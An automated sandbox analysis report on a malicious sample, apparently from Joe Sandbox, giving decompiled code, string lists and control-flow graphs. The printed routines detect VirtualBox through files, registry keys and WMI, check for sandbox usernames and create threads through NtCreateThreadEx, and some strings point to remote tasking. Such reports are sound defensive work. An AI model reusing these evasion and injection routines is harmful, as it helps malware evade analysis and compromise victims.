                0x2152058bcbf
                0x2152058bcc1
                0x2152058bcc6
                0x2152058bcc7
                0x2152058bcce
                0x2152058bcd0
                0x2152058bcd5
                0x2152058bcd6
                0x2152058bcdd
                0x2152058bcdf
                0x2152058bce4
                0x2152058bce9
                0x2152058bceb
                0x2152058bcf0
                0x2152058bcf4
                0x2152058bcf9
                0x2152058bd04
                0x2152058bd0b
                0x2152058bd12
                0x2152058bd1f
                0x2152058bd23
                0x2152058bd2c
                0x2152058bd2f
                0x2152058bd36
                0x2152058bd3a
                0x2152058bd3f
                0x2152058bd4c
                0x2152058bd50
                0x2152058bd55
                0x2152058bd5b
                0x2152058bd5d
                0x2152058bd6a
                0x2152058bd6c
                0x2152058bd79
                0x2152058bd7e
                0x2152058bd81
                0x2152058bd89
                0x2152058bd95
                0x2152058bd9e
                0x2152058bda5
                0x2152058bdaa
                0x2152058bdb1
                0x2152058bdb6
                0x2152058bdbd
                0x2152058bdc4
                0x2152058bdcb
                0x2152058bdcf
                0x2152058bdf0
                0x2152058bdf5
                0x2152058bdf9
                0x2152058be00
                0x2152058be05
                0x2152058be10
                0x2152058be15
                0x2152058be1f
                0x2152058be24
                0x2152058be26
                0x2152058be2b
                0x2152058be2c
                0x2152058be33
                0x2152058be35
                0x2152058be3a
                0x2152058be3b
                0x2152058be42
                0x2152058be44
                0x2152058be49
                0x2152058be4e
                0x2152058be50
                0x2152058be55
                0x2152058be59
                0x2152058be5e
                0x2152058be67
                0x2152058be6c
                0x2152058be71
                0x2152058be80
                0x2152058be87
                0x2152058be8f
                0x2152058be94
                0x2152058be9b
                0x2152058bea0
                0x2152058bea2
                0x2152058bea7
                0x2152058bea8
                0x2152058beaf
                0x2152058beb1
                0x2152058beb6
                0x2152058beb7
                0x2152058bebe
                0x2152058bec0
                0x2152058bec5
                0x2152058beca
                0x2152058becc
                0x2152058bed1
                0x2152058bed5
                0x2152058beda
                0x2152058bee2
                0x2152058bee6
                0x2152058bef4
                0x2152058bf2d
                0x2152058bf32
                0x2152058bf35
                0x2152058bf3d
                0x2152058bf44
                0x2152058bf4c
                0x2152058bf51
                0x2152058bf58
                0x2152058bf5d
                0x2152058bf5f
                0x2152058bf64
                0x2152058bf65
                0x2152058bf6c
                0x2152058bf6e
                0x2152058bf73
                0x2152058bf74
                0x2152058bf7b
                0x2152058bf7d
                0x2152058bf82
                0x2152058bf87
                0x2152058bf89
                0x2152058bf8e
                0x2152058bf92
                0x2152058bf97
                0x2152058bf9f
                0x2152058bfa3
                0x2152058bfa7
                0x2152058bfae
                0x2152058bfb4
                0x2152058bfbb
                0x2152058bfc1
                0x2152058bfd0
                0x2152058bfd6
                0x2152058bfda
                0x2152058bfe0
                0x2152058bfe7
                0x2152058bfed
                0x2152058bff4
                0x2152058bffa
                0x2152058c001
                0x2152058c007
                0x2152058c00e
                0x2152058c014
                0x2152058c01b
                0x2152058c021
                0x2152058c028
                0x2152058c02e
                0x2152058c035
                0x2152058c03b
                0x2152058c042
                0x2152058c048
                0x2152058c04f
                0x2152058c055
                0x2152058c05c
                0x2152058c062
                0x2152058c074
                0x2152058c079
                0x2152058c07b
                0x2152058c080
                0x2152058c081
                0x2152058c086
                0x2152058c087
                0x2152058c08c
                0x2152058c08d
                0x2152058c093
                0x2152058c098
                0x2152058c099
                0x2152058c09e
                0x2152058c09f
                0x2152058c0a4
                0x2152058c0a5
                0x2152058c0ab
                0x2152058c0b2
                0x2152058c0d3

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Sleep$FolderPathSpecial$ProcessTerminateThreadUninitializelstrcat$CurrentInitializeThread32$CloseCreateFirstHandleNextObjectOpenSecuritySingleSnapshotToolhelp32Wait
                • String ID: -Recurse"$" -Force$127.0.0.1$; Remove-Item -Path "$Command : $Domain name: $User name: $\wab.exe$dex$dij$file_entry_point$gdt$iKInPE9WrB$ins$powershell$response_status$sdl$shi$task$task_data$task_id$tasks
                • API String ID: 3213461338-3323971348
                • Opcode ID: ef9d4ee9269239150bda406fe7dbdd15bbfd50020378915354a866fec66954a0
                • Instruction ID: 16f9288759ca391dfc080a8aba478a5409c9816b9090ac54404940955e9d0b26
                • Opcode Fuzzy Hash: ef9d4ee9269239150bda406fe7dbdd15bbfd50020378915354a866fec66954a0
                • Instruction Fuzzy Hash: 8B135A33302EA5C9FB20AF74D8583E923A5FBA5348F501551EE594BAAEDF78C685C340
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 55%
                			E00000215215205CD4D0(void* __ecx, long long __rbx, signed long long __rdi, long long __rsi) {
                				signed char _t67;
                				void* _t83;
                				void* _t87;
                				signed long long _t100;
                				signed long long _t121;
                				void* _t142;
                				signed long long _t147;
                				WCHAR* _t152;
                				void* _t153;
                				void* _t155;
                				signed long long _t156;
                				void* _t158;
                
                				_t147 = __rdi;
                				_t75 = __ecx;
                				 *((long long*)(_t155 + 8)) = __rbx;
                				 *((long long*)(_t155 + 0x10)) = __rsi;
                				 *((long long*)(_t155 + 0x18)) = __rdi;
                				_t153 = _t155 - 0x5f0;
                				_t156 = _t155 - 0x6f0;
                				_t100 =  *0x2067c720; // 0xca1645d940e
                				 *(_t153 + 0x5e0) = _t100 ^ _t156;
                				 *((long long*)(_t156 + 0x30)) = L"System32\\drivers\\VBoxMouse.sys";
                				r8d = 0x208;
                				 *((long long*)(_t156 + 0x38)) = L"System32\\drivers\\VBoxGuest.sys";
                				 *((long long*)(_t156 + 0x40)) = L"System32\\drivers\\VBoxSF.sys";
                				 *((long long*)(_t156 + 0x48)) = L"System32\\drivers\\VBoxVideo.sys";
                				 *((long long*)(_t156 + 0x50)) = L"System32\\vboxdisp.dll";
                				 *((long long*)(_t156 + 0x58)) = L"System32\\vboxhook.dll";
                				 *((long long*)(_t156 + 0x60)) = L"System32\\vboxmrxnp.dll";
                				 *((long long*)(_t156 + 0x68)) = L"System32\\vboxogl.dll";
                				 *((long long*)(_t156 + 0x70)) = L"System32\\vboxoglarrayspu.dll";
                				 *((long long*)(_t156 + 0x78)) = L"System32\\vboxoglcrutil.dll";
                				 *((long long*)(_t153 - 0x80)) = L"System32\\vboxoglerrorspu.dll";
                				 *((long long*)(_t153 - 0x78)) = L"System32\\vboxoglfeedbackspu.dll";
                				 *((long long*)(_t153 - 0x70)) = L"System32\\vboxoglpackspu.dll";
                				 *((long long*)(_t153 - 0x68)) = L"System32\\vboxoglpassthroughspu.dll";
                				 *((long long*)(_t153 - 0x60)) = L"System32\\vboxservice.exe";
                				 *((long long*)(_t153 - 0x58)) = L"System32\\vboxtray.exe";
                				 *((long long*)(_t153 - 0x50)) = L"System32\\VBoxControl.exe";
                				E00000215215205F8EF0(__ecx, 0, _t83, _t87, _t153 + 0x1d0, _t142, __rdi, _t158);
                				r8d = 0x208;
                				E00000215215205F8EF0(_t75, 0, _t83, _t87, _t153 - 0x40, _t142, _t147, _t158);
                				 *(_t156 + 0x28) = _t147;
                				GetWindowsDirectoryW(_t152);
                				if (E00000215215205D00A0() == 0) goto 0x205cd617;
                				__imp__Wow64DisableWow64FsRedirection();
                				_t121 = _t147;
                				__imp__PathCombineW();
                				r8d = 0x200;
                				E00000215215205F8EF0(_t75, 0, 0, _t87, _t153 + 0x3e0, _t153 + 0x1d0, _t147,  *((intOrPtr*)(_t156 + 0x30 + _t121 * 8)));
                				E00000215215205CD1D0(_t75, L"System32\\VBoxControl.exe", _t153 + 0x3e0, _t153 + 0x1d0, L"Checking file %s ", _t153 - 0x40);
                				_t67 = GetFileAttributesW(??); // executed
                				if (_t67 == 0xffffffff) goto 0x205cd679;
                				if ((_t67 & 0x00000010) == 0) goto 0x205cd684;
                				if (_t121 + 1 - 0x11 < 0) goto 0x205cd620;
                				goto 0x205cd689;
                				 *((intOrPtr*)(_t156 + 0x20)) = 0;
                				if ( *0x2067e430 == 8) goto 0x205cd6b2;
                				if (1 - 0x1e < 0) goto 0x205cd6a0;
                				goto 0x205cd711;
                				if ( *0x2152067E484 == dil) goto 0x205cd711;
                				if ( *0x2067e430 == 8) goto 0x205cd6da;
                				if (1 - 0x1e < 0) goto 0x205cd6c8;
                				goto 0x205cd6ef;
                				if ( *0x2152067E46C == dil) goto 0x205cd6ef;
                				GetCurrentProcess();
                				 *((long long*)( *0x2152067E488))();
                				if ( *((intOrPtr*)(_t156 + 0x20)) == 0) goto 0x205cd711;
                				__imp__Wow64RevertWow64FsRedirection();
                				return E00000215215205F59D0(1,  *(_t153 + 0x5e0) ^ _t156, _t156 + 0x20, _t153 - 0x40);
                			}
















                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Wow64$Redirection$AttributesCombineCurrentDirectoryDisableFilePathProcessRevertWindows
                • String ID: Checking file %s $System32\VBoxControl.exe$System32\drivers\VBoxGuest.sys$System32\drivers\VBoxMouse.sys$System32\drivers\VBoxSF.sys$System32\drivers\VBoxVideo.sys$System32\vboxdisp.dll$System32\vboxhook.dll$System32\vboxmrxnp.dll$System32\vboxogl.dll$System32\vboxoglarrayspu.dll$System32\vboxoglcrutil.dll$System32\vboxoglerrorspu.dll$System32\vboxoglfeedbackspu.dll$System32\vboxoglpackspu.dll$System32\vboxoglpassthroughspu.dll$System32\vboxservice.exe$System32\vboxtray.exe
                • API String ID: 2137468328-1036852472
                • Opcode ID: 516fd082578d430764e9c848e0d414f1b568b980de21ec9c37c941b3060ac9f4
                • Instruction ID: 40555b7256b83e45436d706fd905fa48a50e1ae9bd0f3b6c4894e705e4bc2650
                • Opcode Fuzzy Hash: 516fd082578d430764e9c848e0d414f1b568b980de21ec9c37c941b3060ac9f4
                • Instruction Fuzzy Hash: 2B612A37202F60D5EB608B14E8482D973A5FBA4794FA40266DE8E57B6CEF38D685C740
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 958 215205cdcc0-215205cdd22 call 215205d0410 961 215205cdfcb-215205cdfce 958->961 962 215205cdd28-215205cdd68 SysAllocString * 2 958->962 963 215205cdfb2-215205cdfca call 215205f59d0 961->963 964 215205cddc0-215205cddc3 962->964 965 215205cdd6a-215205cdd6d 962->965 966 215205cddce-215205cddd0 964->966 967 215205cddc5-215205cddc8 SysFreeString 964->967 968 215205cdd6f-215205cdd8c 965->968 969 215205cddb7-215205cddba SysFreeString 965->969 971 215205cddd6-215205cdde5 966->971 972 215205cdf97-215205cdfaa 966->972 967->966 976 215205cdd96-215205cdd98 968->976 969->964 974 215205cddeb 971->974 975 215205cdf77-215205cdf91 CoUninitialize 971->975 972->963 977 215205cddf3-215205cddf6 974->977 975->972 976->969 978 215205cdd9a-215205cddb1 CoUninitialize 976->978 980 215205cdf6f 977->980 981 215205cddfc-215205cde1a 977->981 978->969 980->975 986 215205cde20-215205cde3c 981->986 987 215205cdf6b 981->987 989 215205cde42-215205cde44 986->989 987->980 990 215205cdf52-215205cdf63 989->990 991 215205cde4a-215205cde52 989->991 990->977 997 215205cdf69 990->997 991->990 992 215205cde58-215205cde5a 991->992 993 215205cde60-215205cde73 StrCmpIW 992->993 994 215205cdf48-215205cdf4c VariantClear 992->994 993->994 996 215205cde79-215205cdeb8 VariantClear SafeArrayAccessData 993->996 994->990 996->994 999 215205cdebe-215205cdeee SafeArrayGetLBound SafeArrayGetUBound 996->999 997->980 1000 215205cdef0-215205cdf08 SafeArrayGetElement 999->1000 1001 215205cdf3f-215205cdf42 SafeArrayUnaccessData 999->1001 1002 215205cdf10-215205cdf1e call 215206019f0 1000->1002 1001->994 1005 215205cdf20-215205cdf29 1002->1005 1006 215205cdf39 1002->1006 1005->1002 1007 215205cdf2b-215205cdf35 1005->1007 1006->1001 1007->1000 1008 215205cdf37 1007->1008 1008->1001
                C-Code - Quality: 24%
                			E00000215215205CDCC0(void* __edx, long long __rbx, long long __rdi, long long __rsi, long long __r14) {
                				void* _t80;
                				void* _t81;
                				signed char _t87;
                				void* _t88;
                				intOrPtr _t91;
                				void* _t100;
                				void* _t109;
                				signed long long _t130;
                				long long _t134;
                				intOrPtr* _t153;
                				long long _t189;
                				void* _t191;
                				void* _t192;
                				signed long long _t193;
                				long long _t203;
                				void* _t207;
                
                				_t189 = __rsi;
                				_t191 = _t192 - 0x47;
                				_t193 = _t192 - 0xb0;
                				_t130 =  *0x2067c720; // 0xca1645d940e
                				 *(_t191 + 0x37) = _t130 ^ _t193;
                				r12d = 0;
                				 *((long long*)(_t191 + 0x1f)) = L"vboxvideo";
                				 *((long long*)(_t191 - 0x21)) = _t203;
                				 *((long long*)(_t191 + 0x27)) = L"VBoxVideoW8";
                				_t134 = L"VBoxWddm";
                				 *((long long*)(_t191 - 0x11)) = _t203;
                				 *((long long*)(_t191 + 0x2f)) = _t134;
                				r15d = r12d;
                				 *((long long*)(_t191 - 0x29)) = _t203;
                				_t81 = E00000215215205D0410(_t80, _t191 - 0x21, _t191 - 0x11, __rsi); // executed
                				if (_t81 == 0) goto 0x205cdfcb;
                				 *((long long*)(_t193 + 0xd0)) = __rbx;
                				 *((long long*)(_t193 + 0xd8)) = _t189;
                				 *((long long*)(_t193 + 0xe0)) = __rdi;
                				__imp__#2();
                				__imp__#2();
                				if (_t134 == 0) goto 0x205cddc0;
                				if (_t134 == 0) goto 0x205cddb7;
                				 *((long long*)(_t193 + 0x28)) = _t191 - 0x29;
                				_t18 = _t203 + 0x30; // 0x30
                				r9d = _t18;
                				 *((long long*)(_t193 + 0x20)) = _t203;
                				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x21)))) + 0xa0))() >= 0) goto 0x205cddb7;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x21)))) + 0x10))();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x11)))) + 0x10))();
                				__imp__CoUninitialize();
                				__imp__#6();
                				if (_t134 == 0) goto 0x205cddce;
                				__imp__#6();
                				if (r12d == 0) goto 0x205cdf97;
                				_t153 =  *((intOrPtr*)(_t191 - 0x29));
                				 *((long long*)(_t191 - 0x31)) = _t203;
                				 *((intOrPtr*)(_t191 - 0x35)) = r12d;
                				if (_t153 == 0) goto 0x205cdf77;
                				 *((long long*)(_t193 + 0xe8)) = __r14;
                				if (r15d != 0) goto 0x205cdf6f;
                				 *((long long*)(_t193 + 0x20)) = _t191 - 0x35;
                				_t32 = _t207 + 1; // 0x1, executed
                				r8d = _t32;
                				 *((intOrPtr*)( *_t153 + 0x20))();
                				if ( *((intOrPtr*)(_t191 - 0x35)) == r12d) goto 0x205cdf6b;
                				 *((long long*)(_t193 + 0x28)) = _t203;
                				r8d = 0;
                				 *((long long*)(_t193 + 0x20)) = _t203;
                				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x31)))) + 0x20))() < 0) goto 0x205cdf52;
                				_t87 =  *(_t191 - 9) & 0x0000ffff;
                				if (_t87 == 1) goto 0x205cdf52;
                				if ((_t87 & 0x00000008) == 0) goto 0x205cdf48;
                				__imp__StrCmpIW();
                				if (_t87 != 0) goto 0x205cdf48;
                				__imp__#9();
                				 *((long long*)(_t193 + 0x28)) = _t203;
                				r8d = 0;
                				 *((long long*)(_t193 + 0x20)) = _t203;
                				_t88 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x31)))) + 0x20))();
                				__imp__#23();
                				if (_t88 < 0) goto 0x205cdf48;
                				__imp__#20();
                				__imp__#19();
                				_t109 =  *((intOrPtr*)(_t191 - 0x19)) -  *((intOrPtr*)(_t191 - 0x15)) + 1;
                				 *((intOrPtr*)(_t191 - 0x39)) = r12d;
                				if (_t109 <= 0) goto 0x205cdf3f;
                				__imp__#25();
                				if (E00000215215206019F0( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x31)))),  *((intOrPtr*)(_t191 + 0xf)),  *((intOrPtr*)(_t191 + 0x1f))) == 0) goto 0x205cdf39;
                				if (r12d + 1 - 3 < 0) goto 0x205cdf10;
                				_t91 =  *((intOrPtr*)(_t191 - 0x39)) + 1;
                				 *((intOrPtr*)(_t191 - 0x39)) = _t91;
                				if (_t91 - _t109 < 0) goto 0x205cdef0;
                				goto 0x205cdf3f;
                				r15d = 1;
                				__imp__#24();
                				__imp__#9();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x31)))) + 0x10))();
                				if ( *((intOrPtr*)(_t191 - 0x29)) != 0) goto 0x205cddf3;
                				goto 0x205cdf6f;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x29)))) + 0x10))();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x21)))) + 0x10))();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x11)))) + 0x10))();
                				__imp__CoUninitialize(); // executed
                				return E00000215215205F59D0(_t100,  *(_t191 + 0x37) ^ _t193,  *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x11)))), _t191 - 9);
                			}


                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ArraySafe$String$AllocBoundClearDataFreeUninitializeVariant$AccessElementInitializeUnaccess
                • String ID: FileName$SELECT * FROM Win32_NTEventlogFile$Sources$System$VBoxVideoW8$VBoxWddm$WQL$vboxvideo
                • API String ID: 1020912672-1865646205
                • Opcode ID: f315b2c0157307efa368d29ffb0790b31f688a91f09fb474aacb94c57ad301c1
                • Instruction ID: 83dfc0272ab1895b548dc4416d1bc8a31368026b0d9c2e5acc3554d5571623e2
                • Opcode Fuzzy Hash: f315b2c0157307efa368d29ffb0790b31f688a91f09fb474aacb94c57ad301c1
                • Instruction Fuzzy Hash: 6B911033702E60CAEB208F61E4986EC73B0FB98B88F504556DE4AA7A58DF38D509C350
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1019 215205cea60-215205cea8d call 215205d0410 1022 215205cece3-215205ceced 1019->1022 1023 215205cea93-215205cead3 SysAllocString * 2 1019->1023 1024 215205ceb2a-215205ceb32 1023->1024 1025 215205cead5-215205cead8 1023->1025 1028 215205ceb34-215205ceb37 SysFreeString 1024->1028 1029 215205ceb3d-215205ceb4a 1024->1029 1026 215205ceb21-215205ceb24 SysFreeString 1025->1026 1027 215205ceada-215205ceaf6 1025->1027 1026->1024 1034 215205ceb00-215205ceb02 1027->1034 1028->1029 1030 215205cecd3-215205cece2 1029->1030 1031 215205ceb50-215205ceb5f 1029->1031 1032 215205cecb3-215205ceccd CoUninitialize 1031->1032 1033 215205ceb65-215205ceb6f 1031->1033 1032->1030 1035 215205ceb70-215205ceb83 1033->1035 1034->1026 1036 215205ceb04-215205ceb1b CoUninitialize 1034->1036 1038 215205ceb89-215205ceb8d 1035->1038 1036->1026 1040 215205ceb93-215205cebb7 1038->1040 1041 215205cecaf 1038->1041 1046 215205cebb9-215205cebc1 1040->1046 1047 215205cebe8-215205cec0c 1040->1047 1041->1032 1046->1047 1048 215205cebc3-215205cebc5 1046->1048 1052 215205cec0e-215205cec16 1047->1052 1053 215205cec3d-215205cec61 1047->1053 1049 215205cebde-215205cebe2 VariantClear 1048->1049 1050 215205cebc7-215205cebda call 215205f9740 1048->1050 1049->1047 1050->1049 1052->1053 1055 215205cec18-215205cec1a 1052->1055 1061 215205cec92-215205cec9e 1053->1061 1062 215205cec63-215205cec6b 1053->1062 1057 215205cec33-215205cec37 VariantClear 1055->1057 1058 215205cec1c-215205cec2f call 215205f9740 1055->1058 1057->1053 1058->1057 1061->1041 1068 215205ceca0-215205ceca7 1061->1068 1062->1061 1064 215205cec6d-215205cec6f 1062->1064 1066 215205cec71-215205cec84 call 215205f9740 1064->1066 1067 215205cec88-215205cec8c VariantClear 1064->1067 1066->1067 1067->1061 1068->1035 1070 215205cecad 1068->1070 1070->1032
                C-Code - Quality: 21%
                			E00000215215205CEA60(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
                				long long _v32;
                				long long _v40;
                				long long _v48;
                				long long _v56;
                				intOrPtr _v72;
                				signed int _v80;
                				void* _v88;
                				long long _v96;
                				long long _v104;
                				void* __rbx;
                				void* _t71;
                				void* _t72;
                				signed char _t78;
                				signed char _t81;
                				signed char _t84;
                				void* _t94;
                				void* _t128;
                				intOrPtr* _t137;
                				long long _t167;
                				void* _t180;
                				long long _t185;
                
                				_t167 = __rsi;
                				r15d = 0;
                				_a32 = _t185;
                				_v88 = _t185;
                				_a24 = _t185;
                				_t72 = E00000215215205D0410(_t71,  &_a32,  &_v88, __rsi); // executed
                				if (_t72 == 0) goto 0x205cece3;
                				_v32 = _t167;
                				_v40 = __rdi;
                				_v48 = __r12;
                				_v56 = __r14;
                				__imp__#2();
                				__imp__#2();
                				r12d = 1;
                				r14d = r12d;
                				if (__rax == 0) goto 0x205ceb2a;
                				if (__rax == 0) goto 0x205ceb21;
                				_v96 =  &_a24;
                				_t13 = _t185 + 0x30; // 0x30
                				r9d = _t13;
                				_v104 = _t185;
                				_t179 =  *_a32;
                				if ( *((intOrPtr*)( *_a32 + 0xa0))() >= 0) goto 0x205ceb21;
                				r14d = r15d;
                				 *((intOrPtr*)( *_a32 + 0x10))();
                				 *((intOrPtr*)( *_v88 + 0x10))();
                				__imp__CoUninitialize();
                				__imp__#6();
                				if (__rax == 0) goto 0x205ceb3d;
                				__imp__#6();
                				if (r14d == 0) goto 0x205cecd3;
                				_t137 = _a24;
                				_a16 = _t185;
                				_a8 = r15d;
                				if (_t137 == 0) goto 0x205cecb3;
                				asm("o16 nop [eax+eax]");
                				_v104 =  &_a8;
                				r8d = r12d; // executed
                				 *((intOrPtr*)( *_t137 + 0x20))();
                				if (_a8 == r15d) goto 0x205cecaf;
                				_v96 = _t185;
                				r8d = 0;
                				_v104 = _t185;
                				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0x205cebe8;
                				_t78 = _v80 & 0x0000ffff;
                				if (_t78 == r12w) goto 0x205cebe8;
                				if ((_t78 & 0x00000008) == 0) goto 0x205cebde;
                				E00000215215205F9740(_t128, _v72, L"VBOX", _v32,  *_a32, _t180);
                				_t92 =  !=  ? r12d : r15d;
                				__imp__#9();
                				_v96 = _t185;
                				r8d = 0;
                				_v104 = _t185;
                				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0x205cec3d;
                				_t81 = _v80 & 0x0000ffff;
                				if (_t81 == r12w) goto 0x205cec3d;
                				if ((_t81 & 0x00000008) == 0) goto 0x205cec33;
                				E00000215215205F9740(_t128, _v72, L"VBOX", _v32,  *_a32, _t180);
                				_t93 =  !=  ? r12d :  !=  ? r12d : r15d;
                				__imp__#9();
                				_v96 = _t185;
                				r8d = 0;
                				_v104 = _t185;
                				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0x205cec92;
                				_t84 = _v80 & 0x0000ffff;
                				if (_t84 == r12w) goto 0x205cec92;
                				if ((_t84 & 0x00000008) == 0) goto 0x205cec88;
                				E00000215215205F9740(_t128, _v72, L"VEN_VBOX", _v32, _t179, _t180);
                				_t94 =  !=  ? r12d :  !=  ? r12d :  !=  ? r12d : r15d;
                				__imp__#9();
                				 *((intOrPtr*)( *_a16 + 0x10))();
                				if (_t94 != 0) goto 0x205cecaf;
                				if (_a24 != 0) goto 0x205ceb70;
                				goto 0x205cecb3;
                				 *((intOrPtr*)( *_a24 + 0x10))();
                				 *((intOrPtr*)( *_a32 + 0x10))();
                				 *((intOrPtr*)( *_v88 + 0x10))();
                				__imp__CoUninitialize(); // executed
                				return _t94;
                			}


                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$ClearVariantwcsstr$AllocFreeUninitialize$Initialize
                • String ID: Caption$Name$PNPDeviceID$SELECT * FROM Win32_PnPDevice$VBOX$VEN_VBOX$WQL
                • API String ID: 2434920835-607120894
                • Opcode ID: 6f699076be4245c816bb30aee3a34d6a6e2db6215fc6f1578c029c3b824d234a
                • Instruction ID: d630e71c2f19afa0b317e0d4ce6714bc715c8daf857b11b7717ef7c3e073c3e0
                • Opcode Fuzzy Hash: 6f699076be4245c816bb30aee3a34d6a6e2db6215fc6f1578c029c3b824d234a
                • Instruction Fuzzy Hash: 30813677302F60C6EB209F25E8486ED77A0FB94B98F545156EE4A53B68DF38D885C700
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1072 215205cf810-215205cf91f call 215205faeac 1075 215205cf921-215205cf931 GetUserNameW 1072->1075 1076 215205cf93b 1072->1076 1078 215205cf933-215205cf936 call 215205faea4 1075->1078 1079 215205cf959-215205cf975 1075->1079 1077 215205cf940-215205cf958 call 215205f59d0 1076->1077 1078->1076 1081 215205cf980-215205cf9ae call 215205cd1d0 call 215206019f0 1079->1081 1088 215205cf9b0-215205cf9b7 1081->1088 1089 215205cf9bb 1081->1089 1088->1081 1090 215205cf9b9 1088->1090 1091 215205cf9c0-215205cf9e2 call 215205faea4 1089->1091 1090->1091 1091->1077
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: NameUser
                • String ID: Checking if username matches : %s $CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sandbox$maltest$malware$milozs$sand box$test user$timmy$virus
                • API String ID: 2645101109-2358638013
                • Opcode ID: 2aec333ae91d2ab1eb2999078d7cb70e0cf30a0df4f06511f96c67f64b4f8555
                • Instruction ID: a3aece964244860fb90b21e88b1c70d0691e0ca3b2ed91fb438dc64279d5de4a
                • Opcode Fuzzy Hash: 2aec333ae91d2ab1eb2999078d7cb70e0cf30a0df4f06511f96c67f64b4f8555
                • Instruction Fuzzy Hash: BD41E836206F90D5EAB19B01F4883DA73E8FB98790FA00266DE8D07769EF78D549C740
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Thread$AddressContextProc$AllocCreateCurrentHandleModuleProcessResumeVirtual
                • String ID: NtCreateThreadEx$RtlNewSecurityObjectWithMultipleInheritance$ntdll.dll
                • API String ID: 1751073527-1139882446
                • Opcode ID: f92ac50dcbe2c94af1dc0a0c71ddab170fda9b661e52f38cfeb8d8ca3d23f767
                • Instruction ID: 71c09c31650372074e981ecdcf0d15ff37a7f23e0965a8565a9d14914d14c173
                • Opcode Fuzzy Hash: f92ac50dcbe2c94af1dc0a0c71ddab170fda9b661e52f38cfeb8d8ca3d23f767
                • Instruction Fuzzy Hash: 29414B36202F60C6EB20CB11F84879A73A4FBE9B91F644155ED8983BA8DF7CD149CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 57%
                			E00000215215205CD380(void* __eflags, signed int __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                				void* _v8;
                				signed int _v24;
                				char _v536;
                				long long _v552;
                				long long _v560;
                				long long _v568;
                				long long _v576;
                				long long _v584;
                				long long _v592;
                				long long _v600;
                				long long _v608;
                				long long _v616;
                				char _v632;
                				long long _v648;
                				void* __rdi;
                				long _t28;
                				void* _t34;
                				void* _t37;
                				void* _t39;
                				signed long long _t44;
                				void* _t67;
                				void* _t71;
                				signed long long _t72;
                				void* _t74;
                
                				_a8 = __rbx;
                				_a16 = __rsi;
                				_t72 = _t71 - 0x2a0;
                				_t44 =  *0x2067c720; // 0xca1645d940e
                				_v24 = _t44 ^ _t72;
                				_v616 = L"HARDWARE\\ACPI\\DSDT\\VBOX__";
                				_v608 = L"HARDWARE\\ACPI\\FADT\\VBOX__";
                				_v600 = L"HARDWARE\\ACPI\\RSDT\\VBOX__";
                				_v592 = L"SOFTWARE\\Oracle\\VirtualBox Guest Additions";
                				_v584 = L"SYSTEM\\ControlSet001\\Services\\VBoxGuest";
                				_v576 = L"SYSTEM\\ControlSet001\\Services\\VBoxMouse";
                				_v568 = L"SYSTEM\\ControlSet001\\Services\\VBoxService";
                				_v560 = L"SYSTEM\\ControlSet001\\Services\\VBoxSF";
                				_v552 = L"SYSTEM\\ControlSet001\\Services\\VBoxVideo";
                				asm("o16 nop [eax+eax]");
                				r8d = 0x200;
